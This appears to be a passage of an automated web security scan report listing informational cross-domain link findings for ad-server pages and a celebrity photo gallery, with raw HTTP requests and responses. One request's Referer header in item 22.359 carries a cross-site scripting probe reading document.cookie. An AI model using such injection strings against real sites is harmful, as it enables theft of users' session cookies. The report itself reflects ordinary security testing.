<script type="text/javascript" language="javascript" src="http://cdn.doubleverify.com/script44.js?agnc=607671&cmp=CINGCP913401CNT&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=286609711&advid=607930&sid=286609711&adid="></script><img src="http://t.mookie1.com/t/v1/imp?migAgencyId=234&migSource=atlas&migAtlAI=198086410&migRandom=988724102&migTagDesc=Cingular&migAtlSA=286609711&migAtlC=480d7815-42e6-4315-a737-64cdf14f8adc" width="0" height="0" border="0" /></body>
...[SNIP]...

22.355. http://redcated/CNT/iview/286609711/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://redcated
Path:	/CNT/iview/286609711/direct

Issue detail

The page was loaded from a URL containing a query string:

http://redcated/CNT/iview/286609711/direct;wi.300;hi.250/direct/01/181503410?click=http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\

The response contains the following links to other domains:

http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=/http:/clk.redcated/go/286609711/direct;wi.300;hi.250;ai.198086410;ct.1/01
http://cdn.doubleverify.com/script44.js?agnc=607671&cmp=CINGCP913401CNT&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=286609711&advid=607930&sid=286609711&adid=
http://t.mookie1.com/t/v1/imp?migAgencyId=234&migSource=atlas&migAtlAI=198086410&migRandom=299924493&migTagDesc=Cingular&migAtlSA=286609711&migAtlC=480d7815-42e6-4315-a737-64cdf14f8adc

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7206
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 03:04:25 GMT
Connection: close

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-w
...[SNIP]...
<noscript>
<a target="_blank" href="http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\http://clk.redcated/go/286609711/direct;wi.300;hi.250;ai.198086410;ct.1/01"><img border="0" src="HTTP://spe.redcated/ds/CJCNTCINGCP9/1_5_2010_customertargeting/110109_22_UTV_THDVR_29_100B_NOTAG_300x250.jpg?ver=1" width="300" height="250" />
...[SNIP]...
</noscript>
<script type="text/javascript" language="javascript" src="http://cdn.doubleverify.com/script44.js?agnc=607671&cmp=CINGCP913401CNT&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=286609711&advid=607930&sid=286609711&adid="></script><img src="http://t.mookie1.com/t/v1/imp?migAgencyId=234&migSource=atlas&migAtlAI=198086410&migRandom=299924493&migTagDesc=Cingular&migAtlSA=286609711&migAtlC=480d7815-42e6-4315-a737-64cdf14f8adc" width="0" height="0" border="0" /></body>
...[SNIP]...

22.356. http://redcated/CNT/iview/286609711/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://redcated
Path:	/CNT/iview/286609711/direct

Issue detail

The page was loaded from a URL containing a query string:

http://redcated/CNT/iview/286609711/direct;wi.300;hi.250/direct/01/181503410?click=http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\

The response contains the following links to other domains:

http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=/http:/clk.redcated/go/286609711/direct;wi.300;hi.250;ai.198086410;ct.1/01
http://cdn.doubleverify.com/script44.js?agnc=607671&cmp=CINGCP913401CNT&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=286609711&advid=607930&sid=286609711&adid=
http://t.mookie1.com/t/v1/imp?migAgencyId=234&migSource=atlas&migAtlAI=198086410&migRandom=266574726&migTagDesc=Cingular&migAtlSA=286609711&migAtlC=480d7815-42e6-4315-a737-64cdf14f8adc

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7206
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 18:56:29 GMT
Connection: close

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-w
...[SNIP]...
<noscript>
<a target="_blank" href="http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\http://clk.redcated/go/286609711/direct;wi.300;hi.250;ai.198086410;ct.1/01"><img border="0" src="HTTP://spe.redcated/ds/CJCNTCINGCP9/1_5_2010_customertargeting/110109_22_UTV_THDVR_29_100B_NOTAG_300x250.jpg?ver=1" width="300" height="250" />
...[SNIP]...
</noscript>
<script type="text/javascript" language="javascript" src="http://cdn.doubleverify.com/script44.js?agnc=607671&cmp=CINGCP913401CNT&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=286609711&advid=607930&sid=286609711&adid="></script><img src="http://t.mookie1.com/t/v1/imp?migAgencyId=234&migSource=atlas&migAtlAI=198086410&migRandom=266574726&migTagDesc=Cingular&migAtlSA=286609711&migAtlC=480d7815-42e6-4315-a737-64cdf14f8adc" width="0" height="0" border="0" /></body>
...[SNIP]...

22.357. http://redcated/CNT/iview/287065754/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://redcated
Path:	/CNT/iview/287065754/direct

Issue detail

The page was loaded from a URL containing a query string:

http://redcated/CNT/iview/287065754/direct;pc.106032482;wi.160;hi.600/01?click=

The response contains the following link to another domain:

http://cdn.doubleverify.com/script44.js?agnc=607671&cmp=CINGCIN14201CNT&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=287065754&advid=607929&sid=287065754&adid=

Request

GET /CNT/iview/287065754/direct;pc.106032482;wi.160;hi.600/01?click= HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6730
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:30:51 GMT

<html><head><title>FreePhone_TestEvergreen_160x600_011811</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-widt
...[SNIP]...
</noscript>
<script type="text/javascript" language="javascript" src="http://cdn.doubleverify.com/script44.js?agnc=607671&cmp=CINGCIN14201CNT&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=287065754&advid=607929&sid=287065754&adid="></script>
...[SNIP]...

22.358. http://redcated/DEN/jview/286026710/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://redcated
Path:	/DEN/jview/286026710/direct

Issue detail

The page was loaded from a URL containing a query string:

http://redcated/DEN/jview/286026710/direct;;vt.1/01?buster_url=&pub_view_url=&click=

The response contains the following link to another domain:

http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

Request

GET /DEN/jview/286026710/direct;;vt.1/01?buster_url=&pub_view_url=&click= HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6434
Content-Type: text/javascript
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:21:02 GMT

document.write("<meta HTTP-EQUIV='expires' CONTENT='0'></meta>");
document.write("<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'></meta>");

var nRequiredVersion = 9;
var bIsRightVersion = fal
...[SNIP]...

if(bIsRightVersion)
{
var strFQDN = "HTTP://spe.redcated/ds/DEDENBARCISA/";
var index = strFQDN.indexOf("/ds/");
strFQDN = strFQDN.substring(0, index);
_strContentISA1292630112506 = '' + '<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="HTTP://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" id="idSWFISA1292630112506" width="160" height="600">'
+ '<param name="movie" value="HTTP://spe.atdmt.com/ds/DEDENBARCISA/ISHN1350_ETFcenter_160x600.swf?" />
...[SNIP]...

22.359. http://redcated/NYC/iview/264935949/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://redcated
Path:	/NYC/iview/264935949/direct

Issue detail

The page was loaded from a URL containing a query string:

http://redcated/NYC/iview/264935949/direct;;wi.300;hi.250/01?click=

The response contains the following links to other domains:

http://citi.bridgetrack.com/event/?type=-1&BTData=C02177F736E617E5C504A43B1BEBEA9AD95978492FFF7F6EFEAC5C2DEF029DB7&BT_PUB=2&BT_VEN=2331&BT_TRF=26638&r=[RANDOM]
http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=166700&siteID=264935949&creativeID=197994882

Request

GET /NYC/iview/264935949/direct;;wi.300;hi.250/01?click= HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6554
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 13:00:29 GMT

<html>
<head>
<title>BND_Coffee2_FL_300x250_MSN_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body style="border-wi
...[SNIP]...
</noscript>
<script src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=166700&siteID=264935949&creativeID=197994882"></script>
<img src="http://citi.bridgetrack.com/event/?type=-1&BTData=C02177F736E617E5C504A43B1BEBEA9AD95978492FFF7F6EFEAC5C2DEF029DB7&BT_PUB=2&BT_VEN=2331&BT_TRF=26638&r=[RANDOM]" width=1 height=1 border=0>
</body>
...[SNIP]...

22.360. http://wonderwall.redacted/movies/celeb-inc-for-jan-28-11106.gallery previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wonderwall.redacted
Path:	/movies/celeb-inc-for-jan-28-11106.gallery

Issue detail

The page was loaded from a URL containing a query string:

http://wonderwall.redacted/movies/celeb-inc-for-jan-28-11106.gallery?gt1=28135

The response contains the following links to other domains:

http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js
http://bit.ly/e3toNb
http://del.icio.us/post?title=sillybandz&url=http%3A%2F%2Fwonderwall.redacted%2Fmovies%2Fceleb-inc-for-jan-28-11106.gallery%3FphotoId%3D45288
http://digg.com/submit?phase=2title=sillybandz&url=http%3A%2F%2Fwonderwall.redacted%2Fmovies%2Fceleb-inc-for-jan-28-11106.gallery%3FphotoId%3D45288
http://download.live.com/?sku=messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://insidemsn.wordpress.com/
http://microsoft.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/Entertainment.aspx
http://platform.twitter.com/widgets.js
http://reddit.com/submit?title=sillybandz&url=http%3A%2F%2Fwonderwall.redacted%2Fmovies%2Fceleb-inc-for-jan-28-11106.gallery%3FphotoId%3D45288
http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css
http://static.wonderwall.com/cache/css/1296066112/Z2FsbGVyeS5jc3M7Z2FsbGVyeS1zaXRlLmNzcztzdG9yeS5jc3M7c3Rvcnktc2l0ZS5jc3M7dG9wU3Rvcmllcy5jc3M7dG9wU3Rvcmllcy1zaXRlLmNzcztjYXRlZ29yeS5jc3M7Y2F0ZWdvcnktc2l0ZS5jc3M7dmlkZW8uY3NzO3ZpZGVvLXNpdGUuY3NzO3ZpZGVvQ2hhbm5lbHMuY3NzO2NlbGVicml0aWVzLmNzcztjZWxlYnJpdGllcy1zaXRlLmNzcztjZWxlYnJpdHkuY3NzO2NlbGVicml0eS1zaXRlLmNzcztodWIuY3NzO2h1Yi1zaXRlLmNzcztzaXRlU2VhcmNoLmNzcztzaXRlU2VhcmNoLXNpdGUuY3NzO2dlbmVyaWMuY3NzO2dlbmVyaWMtc2l0ZS5jc3M7Z2FtZS5jc3M7Z2FtZS1zaXRlLmNzcztzcGVjaWFsLmNzcztzcGVjaWFsLXNpdGUuY3Nz.css
http://static.wonderwall.com/cache/css/1296066112/Zm9udHMuY3NzO2ZvbnRzLXNpdGUuY3NzO3NpdGUuY3NzO2hlYWRlci5jc3M7bXNuSGVhZGVyLmNzcztiaW5nU2VhcmNoLmNzcztidXp6U3RyZWFtLmNzcztidXp6U3RyZWFtLXNpdGUuY3NzO3dhbGwuY3NzO3BjLmNzcztwYy1zaXRlLmNzcztuZXdzU3RyaXAuY3NzO2Zvb3Rlci5jc3M7cGFnaW5hdGlvbi5jc3M7dml0YWxpdHkuY3NzO2VtYmVkZGVkU2VhcmNoLmNzczt2b3RlLmNzcztyYXRpbmcuY3NzO21vcmVUaXRsZXMuY3NzO2V2ZXJ5dGhpbmcuY3NzO2NvbW1lbnRzLmNzcztjb21tZW50cy1zaXRlLmNzcztjcm9zc1Byb21vLmNzcztzaGFyZS5jc3M7c2hhcmUtc2l0ZS5jc3M7ZnJhbmNoaXNlTGlzdC5jc3M7ZmJTdHJpcGUuY3Nz.css
http://static.wonderwall.com/photos/Module1x1/1226_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/15124_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/15298_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/15856_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/15894_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/18487_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/25615_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/27217_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/32972_Module1x1_634164434770437095.jpg
http://static.wonderwall.com/photos/Module1x1/41323_Module1x1_634261162153428902.jpg
http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/7477_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/7503_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/7877_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/7895_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/8376_Module1x1.jpg
http://static.wonderwall.com/photos/Module1x1/9389_Module1x1.jpg
http://static.wonderwall.com/photos/Original/45288_Original.jpg
http://tl.gd/8fkbn3
http://twitpic.com/3kde2c
http://twitpic.com/3umrxp
http://twitter.com/2RQ
http://twitter.com/AIDSPolicyProj
http://twitter.com/AubreyODay
http://twitter.com/AubreyODay/statuses/31475592251580417
http://twitter.com/AubreyODay/statuses/31478843529232385
http://twitter.com/BowWow
http://twitter.com/BowWow/statuses/31481112115019776
http://twitter.com/BrianLynch
http://twitter.com/CarlaDiBello
http://twitter.com/DJPaulyD
http://twitter.com/DJPaulyD/statuses/31480933047603200
http://twitter.com/KimKardashian
http://twitter.com/KimKardashian/statuses/31468288559030272
http://twitter.com/KimKardashian/statuses/31468574493114368
http://twitter.com/LoBosworth
http://twitter.com/LoBosworth/statuses/31474891412738048
http://twitter.com/MirandaBuzz
http://twitter.com/MirandaBuzz/statuses/31469606199623680
http://twitter.com/PaulaAbdul
http://twitter.com/PerezHilton
http://twitter.com/PerezHilton/statuses/31481637023784960
http://twitter.com/PeterGriffinn
http://twitter.com/Punch800
http://twitter.com/RicardoFenty
http://twitter.com/SarahKSilverman
http://twitter.com/SarahKSilverman/statuses/31469730384580608
http://twitter.com/StevenGParry
http://twitter.com/__shelovesB
http://twitter.com/ashleeRocs
http://twitter.com/avoyermagyan
http://twitter.com/barbara230
http://twitter.com/csiriano
http://twitter.com/csiriano/statuses/31485259056943104
http://twitter.com/dovetailchicago
http://twitter.com/emmarosekenney
http://twitter.com/emmyrossum
http://twitter.com/emmyrossum/statuses/31490256649850880
http://twitter.com/iamdiddy
http://twitter.com/iamdiddy/statuses/31469852891807744
http://twitter.com/izzy_kardashian
http://twitter.com/kurumiuchino
http://twitter.com/llcoolj
http://twitter.com/llcoolj/statuses/31477242445959168
http://twitter.com/mccordalex
http://twitter.com/mccordalex/statuses/31471195719208960
http://twitter.com/michaelianblack
http://twitter.com/michaelianblack/statuses/31488824462811136
http://twitter.com/michaelianblack/statuses/31490865776037888
http://twitter.com/racheljosephf
http://twitter.com/rainnwilson
http://twitter.com/rainnwilson/statuses/31475437494345729
http://twitter.com/rihanna
http://twitter.com/rihanna/statuses/31482886624378880
http://twitter.com/rihanna/statuses/31484086254051328
http://twitter.com/rihanna/statuses/31485881311297536
http://twitter.com/samantharonson
http://twitter.com/samantharonson/statuses/31473844573179904
http://twitter.com/samantharonson/statuses/31473906485297152
http://twitter.com/samantharonson/statuses/31474068645478400
http://twitter.com/samantharonson/statuses/31474364587180033
http://twitter.com/share?original_referer=http%3A%2F%2Fwonderwall.redacted%2Fmovies%2Fceleb-inc-for-jan-28-11106.gallery%3FphotoId%3D45288%26ocid%3Dtwtr-utweet
http://twitter.com/traverrains
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?FORM=CWWWBQ
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bing.com/videos/watch/video/celebrity-gridiron-fans/ufd8pil8?q=Football+Fan&rel=msn&from=en-us_msnhp&form=MSNXNM&ocid=xnetr1-5
http://www.bltwy.com/
http://www.buzzfeed.com/ashleybaccam/kardashian-silly-bandz
http://www.delish.com/
http://www.delish.com/recipes/cooking-recipes/tailgating-football-recipes?ocid=xnetr1-3
http://www.mixx.com/submit?page_url=http%3A%2F%2Fwonderwall.redacted%2Fmovies%2Fceleb-inc-for-jan-28-11106.gallery%3FphotoId%3D45288
http://www.myspace.com/Modules/PostTo/Pages/?l=3t=sillybandz&u=http%3A%2F%2Fwonderwall.redacted%2Fmovies%2Fceleb-inc-for-jan-28-11106.gallery%3FphotoId%3D45288
http://yfrog.com/hsi3mlfj
http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js
https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fwonderwall.redacted%2Fmovies%2Fceleb-inc-for-jan-28-11106.gallery%3FphotoId%3D45288
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /movies/celeb-inc-for-jan-28-11106.gallery?gt1=28135 HTTP/1.1
Host: wonderwall.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 23:51:47 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if lt IE 7]> <html class="ie ie6 lte9 lte8 lte7" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<meta name="medium" content="image" />
<link rel="image_src" href="http://static.wonderwall.com/photos/Original/45288_Original.jpg" />

<meta property="fb:app_id" content="111376106992" />
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js"></script>
...[SNIP]...
</script>
<script src="http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<link rel="stylesheet" type="text/css" href="http://static.wonderwall.com/cache/css/1296066112/Zm9udHMuY3NzO2ZvbnRzLXNpdGUuY3NzO3NpdGUuY3NzO2hlYWRlci5jc3M7bXNuSGVhZGVyLmNzcztiaW5nU2VhcmNoLmNzcztidXp6U3RyZWFtLmNzcztidXp6U3RyZWFtLXNpdGUuY3NzO3dhbGwuY3NzO3BjLmNzcztwYy1zaXRlLmNzcztuZXdzU3RyaXAuY3NzO2Zvb3Rlci5jc3M7cGFnaW5hdGlvbi5jc3M7dml0YWxpdHkuY3NzO2VtYmVkZGVkU2VhcmNoLmNzczt2b3RlLmNzcztyYXRpbmcuY3NzO21vcmVUaXRsZXMuY3NzO2V2ZXJ5dGhpbmcuY3NzO2NvbW1lbnRzLmNzcztjb21tZW50cy1zaXRlLmNzcztjcm9zc1Byb21vLmNzcztzaGFyZS5jc3M7c2hhcmUtc2l0ZS5jc3M7ZnJhbmNoaXNlTGlzdC5jc3M7ZmJTdHJpcGUuY3Nz.css" />
<link rel="stylesheet" type="text/css" href="http://static.wonderwall.com/cache/css/1296066112/Z2FsbGVyeS5jc3M7Z2FsbGVyeS1zaXRlLmNzcztzdG9yeS5jc3M7c3Rvcnktc2l0ZS5jc3M7dG9wU3Rvcmllcy5jc3M7dG9wU3Rvcmllcy1zaXRlLmNzcztjYXRlZ29yeS5jc3M7Y2F0ZWdvcnktc2l0ZS5jc3M7dmlkZW8uY3NzO3ZpZGVvLXNpdGUuY3NzO3ZpZGVvQ2hhbm5lbHMuY3NzO2NlbGVicml0aWVzLmNzcztjZWxlYnJpdGllcy1zaXRlLmNzcztjZWxlYnJpdHkuY3NzO2NlbGVicml0eS1zaXRlLmNzcztodWIuY3NzO2h1Yi1zaXRlLmNzcztzaXRlU2VhcmNoLmNzcztzaXRlU2VhcmNoLXNpdGUuY3NzO2dlbmVyaWMuY3NzO2dlbmVyaWMtc2l0ZS5jc3M7Z2FtZS5jc3M7Z2FtZS1zaXRlLmNzcztzcGVjaWFsLmNzcztzcGVjaWFsLXNpdGUuY3Nz.css" />
<link rel="stylesheet" media="only screen and (max-device-width: 480px)" href="http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css" />
<link rel="stylesheet" media="only screen and (min-device-width: 481px) and (max-device-width: 1024px)" href="http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css" />
</head>
...[SNIP]...
<span><img src="http://static.wonderwall.com/photos/Original/45288_Original.jpg" class="imgSrc-http://static.wonderwall.com/photos/Original/45288_Original.jpg" alt="By Michelle LanzMaking it in the competitive world of showbiz takes a lot more than talent these days; you need a recognizable name, a diversified brand and shameless self-promotion. Click through to see which celebs are selling products and selling out this season. They already have their famous name on books, perfumes, TV shows and even their own credit card, but now the Kardashian sisters are venturing into the lucrative business of Silly Bandz. Yep, now you can get your wrists on these trendy plastic bracelets with shapes that include shoes, perfumes, the letter K and even silhouettes of the girls. And yes, Khloe's band is slightly taller than the others. Hey those Silly Bandz manufacturers sure are sticklers for accuracy.RELATED: Celebs Who Need an Exorcism" /></span>
...[SNIP]...
<P ALIGN="LEFT">They already have their famous name on books, perfumes, TV shows and even their own credit card, but now the Kardashian sisters are venturing into the lucrative business of <A HREF="http://www.buzzfeed.com/ashleybaccam/kardashian-silly-bandz" TARGET="_blank">Silly Bandz</A>
...[SNIP]...
<li class="shareItem shareItem-twitter"><a href="http://twitter.com/share?original_referer=http%3A%2F%2Fwonderwall.redacted%2Fmovies%2Fceleb-inc-for-jan-28-11106.gallery%3FphotoId%3D45288%26ocid%3Dtwtr-utweet" class="twitterProxy"></a>
...[SNIP]...
<li class="shareItem shareItem-windowsLive first"><a href="https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fwonderwall.redacted%2Fmovies%2Fceleb-inc-for-jan-28-11106.gallery%3FphotoId%3D45288" target="_blank">Windows Live</a>
...[SNIP]...
<li class="shareItem shareItem-delicious"><a href="http://del.icio.us/post?title=sillybandz&url=http%3A%2F%2Fwonderwall.redacted%2Fmovies%2Fceleb-inc-for-jan-28-11106.gallery%3FphotoId%3D45288" target="_blank">Delicious</a></li><li class="shareItem shareItem-myspace"><a href="http://www.myspace.com/Modules/PostTo/Pages/?l=3t=sillybandz&u=http%3A%2F%2Fwonderwall.msn.com%2Fmovies%2Fceleb-inc-for-jan-28-11106.gallery%3FphotoId%3D45288" target="_blank">MySpace</a></li><li class="shareItem shareItem-digg"><a href="http://digg.com/submit?phase=2title=sillybandz&url=http%3A%2F%2Fwonderwall.redacted%2Fmovies%2Fceleb-inc-for-jan-28-11106.gallery%3FphotoId%3D45288" target="_blank">Digg</a></li><li class="shareItem shareItem-mixx"><a href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fwonderwall.redacted%2Fmovies%2Fceleb-inc-for-jan-28-11106.gallery%3FphotoId%3D45288" target="_blank">Mixx</a></li><li class="shareItem shareItem-reddit last"><a href="http://reddit.com/submit?title=sillybandz&url=http%3A%2F%2Fwonderwall.redacted%2Fmovies%2Fceleb-inc-for-jan-28-11106.gallery%3FphotoId%3D45288" target="_blank">Reddit</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15894_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/michaelianblack">michaelianblack</a>: <a href="http://twitter.com/BrianLynch">@BrianLynch</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/michaelianblack/statuses/31490865776037888">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/41323_Module1x1_634261162153428902.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/emmyrossum">emmyrossum</a>: Day off today, <a href="http://twitter.com/emmarosekenney">@emmarosekenney</a> and I hit up <a href="http://twitter.com/dovetailchicago">@dovetailchicago</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/emmyrossum/statuses/31490256649850880">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15894_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/michaelianblack">michaelianblack</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/michaelianblack/statuses/31488824462811136">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/27217_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rihanna">rihanna</a>: <a href="http://twitter.com/__shelovesB">@__shelovesB</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rihanna/statuses/31485881311297536">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15298_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/csiriano">csiriano</a>: Important! Various ticket websites are selling fake tickets to my fashion show. I wish everyone who wanted to (cont) <a href="http://tl.gd/8fkbn3">http://tl.gd/8fkbn3</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/csiriano/statuses/31485259056943104">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/27217_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rihanna">rihanna</a>: #puppyNAVY ? RT <a href="http://twitter.com/RicardoFenty">@RicardoFenty</a>: #DogNavy <a href="http://twitpic.com/3kde2c">http://twitpic.com/3kde2c</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rihanna/statuses/31484086254051328">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/27217_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rihanna">rihanna</a>: <a href="http://twitter.com/StevenGParry">@StevenGParry</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rihanna/statuses/31482886624378880">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/9389_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/PerezHilton">PerezHilton</a>: <a href="http://twitter.com/PaulaAbdul">@PaulaAbdul</a>
...[SNIP]...
